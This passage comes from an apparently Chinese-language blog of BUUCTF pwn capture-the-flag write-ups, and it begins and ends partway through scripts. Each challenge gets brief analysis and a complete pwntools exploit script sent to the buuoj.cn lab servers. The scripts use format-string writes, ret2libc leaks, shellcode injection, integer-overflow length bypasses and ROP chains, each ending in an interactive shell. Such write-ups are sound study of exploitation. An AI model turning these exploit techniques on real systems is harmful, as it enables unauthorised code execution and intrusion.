class="comment">#偏移量+libc函数地址=实际函数地址</span></span><br><span class="line">system=offset+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#第二次payload，实现交互</span></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;choice!\n&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">payload=<span class="string">&#x27;\0&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x50</span>-<span class="number">1</span>+<span class="number">8</span>)+p64(ret)+p64(rdi)+p64(binsh)+p64(system)</span><br><span class="line">r.sendlineafter(<span class="string">&#x27;encrypted\n&#x27;</span>,payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="PWN5"><a href="#PWN5" class="headerlink" title="PWN5"></a>PWN5</h3><p>照例</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210815225707104.png" alt="image-20210815225707104"></p>
<p>IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210815225729946.png" alt="image-20210815225729946"></p>
<p>格式化字符串漏洞，根据if语句分析要改写unk_804C044之中的数据，然后输入数据对比atoi就行。</p>
<p>跟进</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210815230104471.png" alt="image-20210815230104471"></p>
<p>记录下地址</p>
<p>测偏移量</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210815230158791.png" alt="image-20210815230158791"></p>
<p>数一下是10，又知道长度是4个字节，那么任意写就可表示为</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%10<span class="variable">$hhn</span>%11<span class="variable">$hhn</span>%12<span class="variable">$hhn</span>%13<span class="variable">$hhn</span></span><br></pre></td></tr></table></figure>
<p>然后前边加上任写的地址就行</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#from LibcSearcher import LibcSearcher</span></span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">26137</span>)</span><br><span class="line">addr = <span class="number">0x0804C044</span></span><br><span class="line">payload= p32(addr)+p32(addr+<span class="number">1</span>)+p32(addr+<span class="number">2</span>)+p32(addr+<span class="number">3</span>)+<span class="string">&quot;%10$hhn%11$hhn%12$hhn%13$hhn&quot;</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>思路二： <a target="_blank" rel="noopener" href="https://www.jianshu.com/p/0501f4dbaf9e">第五空间2019 决赛]PWN5  (jianshu.com)</a></p>
<p>用fmtstr构造更快，思路是利用格式化字符串改写atoi的got地址，将其改为system的地址，配合之后的输入，得到shell</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#from LibcSearcher import LibcSearcher</span></span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">26137</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#改写atoi的got地址，将其改为system的地址</span></span><br><span class="line">atoi_got=elf.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line">system_plt=elf.plt[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload=fmtstr_payload(<span class="number">10</span>,&#123;atoi_got:system_plt&#125;)</span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="babyrop"><a href="#babyrop" class="headerlink" title="babyrop"></a>babyrop</h3><p>32位ret2libc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">28218</span>)</span><br><span class="line"><span class="comment">#r=process(&#x27;./pwn01&#x27;)</span></span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn01&#x27;</span>)</span><br><span class="line">write_plt=elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">read_got=elf.got[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">read_plt=elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">main_addr=<span class="number">0x8048825</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload1=<span class="string">&#x27;\x00&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">6</span>+<span class="string">&#x27;\xff&#x27;</span></span><br><span class="line">r.sendline(payload1)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;Correct\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0xe7</span>+<span class="string">&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(write_plt)+p32(main_addr)+p32(<span class="number">1</span>)+p32(read_got)+p32(<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">read_addr=u32(r.recv(<span class="number">4</span>))</span><br><span class="line">print(<span class="string">&#x27;[+]read_addr: &#x27;</span>,<span class="built_in">hex</span>(read_addr))</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;read&#x27;</span>,read_addr)</span><br><span class="line">libc_base=read_addr-libc.dump(<span class="string">&#x27;read&#x27;</span>)</span><br><span class="line">system_addr=libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">bin_sh_addr=libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r.sendline(payload1)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;Correct\n&#x27;</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0xe7</span>+<span class="string">&#x27;b&#x27;</span>*<span class="number">0x4</span></span><br><span class="line">payload+=p32(system_addr)*<span class="number">2</span>+p32(bin_sh_addr)</span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive(）</span><br></pre></td></tr></table></figure>
<h3 id="ciscn2019n8"><a href="#ciscn2019n8" class="headerlink" title="ciscn2019n8"></a>ciscn2019n8</h3><p>保护全开，IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211020203126501.png" alt="image-20211020203126501"></p>
<p>简单易懂，令var[13]=17就行</p>
<p>知识补充：qword全称是Quad Word。2个字节就是1个Word（1个字，16位），q就是英文quad-这个词根（意思是4）的首字母，所以它是word的四倍，8字节</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">29558</span>)</span><br><span class="line">payload=<span class="string">b&quot;aaaa&quot;</span>*<span class="number">13</span>+p32(<span class="number">17</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h3><p>遇到timeout了，再加一遍地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">26843</span>)</span><br><span class="line">payload=<span class="string">b&quot;a&quot;</span>*<span class="number">140</span>+p32(<span class="number">0x08048320</span>)+p32(<span class="number">0x08048320</span>)+p32(<span class="number">0x0804A024</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&quot;Input:&quot;</span>,payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="get-started-3dsctf-2016"><a href="#get-started-3dsctf-2016" class="headerlink" title="get_started_3dsctf_2016"></a>get_started_3dsctf_2016</h3><p>wp参考：[(9条消息) <a target="_blank" rel="noopener" href="https://blog.csdn.net/mcmuyanga/article/details/108274091">BUUCTF]PWN11——get_started_3dsctf_2016_mcmuyanga的博客-CSDN博客_get_started_3dsctf_2016</a></p>
<p>这题的主要方法就是利用ret持续控制程序</p>
<p>知识补充：</p>
<p>mprotect()函数：把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。</p>
<h3 id="not-the-same-3dsctf-2016"><a href="#not-the-same-3dsctf-2016" class="headerlink" title="not_the_same_3dsctf_2016"></a>not_the_same_3dsctf_2016</h3><p>wp参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/Mua2Uncle2blog/p/15180573.html">not_the_same_3dsctf_2016来自BUUCTF - Mua_Uncle_W - 博客园 (cnblogs.com)</a></p>
<p>知识补充：fopen，fgets函数，用fopen将flag.txt文件读取，fgets存放到f14g里面</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211021151827895.png" alt="image-20211021151827895"></p>
<p>跟进可知他在.bss段<img src="/2021/11/05/Buuctf-pwn/image-20211021152138878.png" alt="image-20211021152138878"></p>
<p>可以作为覆盖地址</p>
<p>垃圾数据填充 get_secret函数的地址  write函数的地址  fl4g变量的位置  最后是write函数的参数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">r=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">26002</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./same&#x27;</span>)</span><br><span class="line">flag_add=<span class="number">0x080ECA2D</span></span><br><span class="line">get_secret=<span class="number">0x080489a0</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x2D</span>+p32(get_secret)+p32(elf.symbols[<span class="string">&#x27;write&#x27;</span>])+p32(flag_add)+p32(<span class="number">0</span>)+p32(flag_add)+p32(<span class="number">45</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="ciscn-2019-n-5"><a href="#ciscn-2019-n-5" class="headerlink" title="ciscn_2019_n_5"></a>ciscn_2019_n_5</h3><p>.bss段上name可利用为/bin/sh</p>
<p>然后就是简单的栈溢出</p>
<p><img src="/2021/11/05/Buuctf-pwn/pwn学习记录/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21jbXV5YW5nYQ==,size_16,color_FFFFFF,t_70%23pic_center.png" alt="img"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">28304</span>)</span><br><span class="line"></span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line">r.sendlineafter(<span class="string">&#x27;tell me your name&#x27;</span>,shellcode)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x28</span>+p64(<span class="number">0x601080</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&#x27;What do you want to say to me?&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="others-shellcode"><a href="#others-shellcode" class="headerlink" title="others_shellcode"></a>others_shellcode</h3><p>IDA发现是getshell利用shellcode，直接nc</p>
<h3 id="ciscn-2019-ne-5"><a href="#ciscn-2019-ne-5" class="headerlink" title="ciscn_2019_ne_5"></a>ciscn_2019_ne_5</h3><p>‘sh’也可以拿shell，不一定是/bin/sh</p>
<p>ROPgadget查字符串</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ciscn2019ne5 --string &#39;sh&#39;</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211023212427788.png" alt="image-20211023212427788"></p>
<p>然后IDA，主函数是一堆选项</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211023213232716.png" alt="image-20211023213232716"></p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211023213057682.png" alt="image-20211023213057682"></p>
<p>意思是最后是要退回到GetFlag里执行栈。</p>
<p>跟进GetFlag有strcpy函数，栈溢出。分别跟进dest和src</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211023212746980.png" alt="image-20211023212746980"></p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211023212505052.png" alt="image-20211023212505052"></p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211023212853269.png" alt="image-20211023212853269"></p>
<p>所以在shell前加8字节才能覆盖</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">29146</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Please input admin password:&quot;</span>)</span><br><span class="line">r.sendline( <span class="string">&quot;administrator&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;0.Exit\n:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">sys=<span class="number">0x080484d0</span></span><br><span class="line">sh=<span class="number">0x080482ea</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">76</span>+p32(sys)+<span class="string">&#x27;aaaa&#x27;</span>+p32(sh)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Please input new log info:&quot;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;0.Exit\n:&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="bjdctf-2020-babyrop"><a href="#bjdctf-2020-babyrop" class="headerlink" title="bjdctf_2020_babyrop"></a>bjdctf_2020_babyrop</h3><p>64位简简单单的ret2libc，直接套模板</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn07&#x27;)</span></span><br><span class="line"><span class="comment">#context(arch=&#x27;amd64&#x27;,os=&#x27;linux&#x27;,log_level=&#x27;debug&#x27;)</span></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27518</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./bjdbabyrop&#x27;</span>)</span><br><span class="line"></span><br><span class="line">main=elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">puts_plt=elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">pop_rdi=<span class="number">0x400733</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x20</span>+<span class="number">8</span>)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;Pull up your sword and tell me u story!&#x27;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recv()</span><br><span class="line">puts_addr=u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts_addr)</span><br><span class="line"></span><br><span class="line">offset=puts_addr-libc.dump(<span class="string">&#x27;puts&#x27;</span>)</span><br><span class="line">system=offset+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">bin_sh=offset+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x20</span>+<span class="number">8</span>)+p64(pop_rdi)+p64(bin_sh)+p64(system)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;Pull up your sword and tell me u story!&#x27;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="pwn2-sctf-2016"><a href="#pwn2-sctf-2016" class="headerlink" title="pwn2_sctf_2016"></a>pwn2_sctf_2016</h3><p>wp参考：[<a target="_blank" rel="noopener" href="https://www.cnblogs.com/xlrp/p/14273706.html">BUUCFT]PWN——pwn2_sctf_2016 - Angel-Yan - 博客园 (cnblogs.com)</a></p>
<p>查</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211026173858837.png" alt="image-20211026173858837"></p>
<p>IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211026174310934.png" alt="image-20211026174310934"></p>
<p>发现溢出点</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211026175946526.png" alt="image-20211026175946526"></p>
<p>跟进atoi，发现整数溢出</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211026174359554.png" alt="image-20211026174359554"></p>
<p>unsigned int，int等都可以利用整数溢出实现缓冲区溢出攻击。输入负数，绕过长度限制，造成溢出</p>
<p>没system，用ret2libc打，换printf</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">26337</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn2sctf&#x27;</span>)</span><br><span class="line"></span><br><span class="line">printf_plt=elf.plt[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">printf_got=elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">main=elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&#x27;How many bytes do you want me to read? &#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;-1&#x27;</span>)<span class="comment">#输入-1的话会成为4294967295造成溢出</span></span><br><span class="line">r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x2c</span>+<span class="number">4</span>)+p32(printf_plt)+p32(main)+p32(printf_got)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">printf_addr=u32(r.recv(<span class="number">4</span>))</span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;printf&#x27;</span>,printf_addr)</span><br><span class="line"></span><br><span class="line">offset=printf_addr-libc.dump(<span class="string">&#x27;printf&#x27;</span>)</span><br><span class="line">system=offset+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">bin_sh=offset+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&#x27;How many bytes do you want me to read? &#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x2c</span>+<span class="number">4</span>)+p32(system)+p32(main)+p32(bin_sh)</span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="jarvisoj-fm"><a href="#jarvisoj-fm" class="headerlink" title="jarvisoj_fm"></a>jarvisoj_fm</h3><p>先查</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211026183855261.png" alt="image-20211026183855261"></p>
<p>IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211026183908484.png" alt="image-20211026183908484"></p>
<p>标准最简单的格式化字符串</p>
<p>经典测偏移</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211026183942799.png" alt="image-20211026183942799"></p>
<p>11</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context(arch = &#x27;amd64&#x27;, os = &#x27;linux&#x27;)</span></span><br><span class="line">r=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">26189</span>)</span><br><span class="line">x_addr=<span class="number">0x0804a02c</span></span><br><span class="line">payload=p32(x_addr)+<span class="string">&#x27;%11$n&#x27;</span></span><br><span class="line">r.send(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="bjdctf-2020-babystack2"><a href="#bjdctf-2020-babystack2" class="headerlink" title="bjdctf_2020_babystack2"></a>bjdctf_2020_babystack2</h3><p>标准的简单整数溢出</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context(arch = &#x27;amd64&#x27;, os = &#x27;linux&#x27;)</span></span><br><span class="line"><span class="comment">#r = process(&quot;./CGfsb&quot;)</span></span><br><span class="line">r=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">29824</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&#x27;[+]Please input the length of your name:&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line">backdoor=<span class="number">0x400726</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">24</span>+p64(backdoor)</span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="baby-rop2"><a href="#baby-rop2" class="headerlink" title="baby_rop2"></a>baby_rop2</h3><p>wp参考：[<a target="_blank" rel="noopener" href="https://www.cnblogs.com/xlrp/p/14273707.html">BUUCTF]PWN——[HarekazeCTF2019]baby_rop2 - Angel-Yan - 博客园 (cnblogs.com)</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&#x27;./babyrop2&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node3.buuoj.cn&#x27;</span>,<span class="number">28485</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;babyrop2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400733</span></span><br><span class="line">pop_rsi_r15 = <span class="number">0x0000000000400731</span> </span><br><span class="line">format_str = <span class="number">0x0000000000400770</span>  </span><br><span class="line">ret_addr = <span class="number">0x0000000000400734</span></span><br><span class="line"></span><br><span class="line">printf_plt = elf.plt[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">read_got = elf.got[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">main_plt = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x28</span>+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(<span class="number">0</span>)+p64(printf_plt)+p64(main_plt)</span><br><span class="line"></span><br><span 